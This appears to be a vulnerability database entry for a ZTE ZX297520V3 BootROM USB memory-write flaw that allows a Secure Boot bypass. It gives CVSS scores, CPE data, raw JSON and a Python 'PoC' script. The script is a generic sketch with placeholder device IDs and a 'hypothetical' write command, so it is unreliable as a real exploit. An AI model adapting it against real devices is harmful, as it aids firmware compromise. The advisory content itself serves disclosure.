Security Vulnerability Report
CVE-2026-40003 CVSS 5.1 MEDIUM

CVE-2026-40003

Published: 2026-05-07 02:16:03
Last Modified: 2026-05-13 19:19:27

Description

ZTE ZX297520V3 BootROM contains a vulnerability that allows arbitrary memory writes via USB. Attackers can exploit the lack of target address validation in the USB download mode to write data to any location in BootROM runtime memory, thereby overwriting the stack, hijacking the execution flow, bypassing the Secure Boot signature verification mechanism, and achieving unauthorized code execution.

CVSS Details

CVSS Score: 5.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:L

Configurations (Affected Products)

cpe:2.3:o:zte:zx297520v3_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:zte:zx297520v3:-:*:*:*:*:*:*:* - NOT VULNERABLE
ZTE ZX297520V3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import usb.core
import usb.util

# PoC for CVE-2026-40003: ZTE ZX297520V3 BootROM Arbitrary Memory Write
# This script demonstrates the concept of writing to an arbitrary address via USB.
# Target: ZTE ZX297520V3 in USB Download Mode

VID = 0xXXXX  # Replace with actual Vendor ID
PID = 0xXXXX  # Replace with actual Product ID


def exploit():
    # Find the device
    dev = usb.core.find(idVendor=VID, idProduct=PID)
    if dev is None:
        raise ValueError('Device not found')

    # Claim the interface
    dev.set_configuration()

    # Target Memory Address (Example: Stack Address or Function Pointer)
    # The vulnerability allows writing to any address.
    target_address = 0x40008000

    # Payload to write (e.g., shellcode or ROP gadget address)
    payload = b'\x00\x00\x00\x00'

    print(f"[*] Sending payload to address: {hex(target_address)}")

    # Construct the specific control transfer or bulk transfer
    # based on the ZTE USB protocol.
    # This is a generic representation of the vulnerability trigger.
    try:
        # Send data to the specific address without validation
        dev.ctrl_transfer(
            bmRequestType=0x40,  # Vendor specific, Host to Device
            bRequest=0xA0,       # Write command (hypothetical)
            wValue=(target_address & 0xFFFF),
            wIndex=(target_address >> 16),
            data_or_wLength=payload,
            timeout=1000
        )
        print("[+] Payload sent successfully. Execution flow may be hijacked.")
    except usb.core.USBError as e:
        print(f"[-] Error during transfer: {e}")


if __name__ == "__main__":
    exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40003", "sourceIdentifier": "[email protected]", "published": "2026-05-07T02:16:03.453", "lastModified": "2026-05-13T19:19:26.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZTE ZX297520V3 BootROM contains a vulnerability that allows arbitrary memory writes via USB. Attackers can exploit the lack of target address validation in the USB download mode to write data to any location in BootROM runtime memory, thereby overwriting the stack, hijacking the execution flow, bypassing the Secure Boot signature verification mechanism, and achieving unauthorized code execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:L", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.4, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zte:zx297520v3_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "6E69F8B0-75E7-4BD9-A4C7-4F3CF428CEE7"}]}, {"operator": "OR", 
"negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zte:zx297520v3:-:*:*:*:*:*:*:*", "matchCriteriaId": "B664C83E-0249-47BB-A3AD-1E9C4DF34206"}]}]}], "references": [{"url": "https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2144487415169560645", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}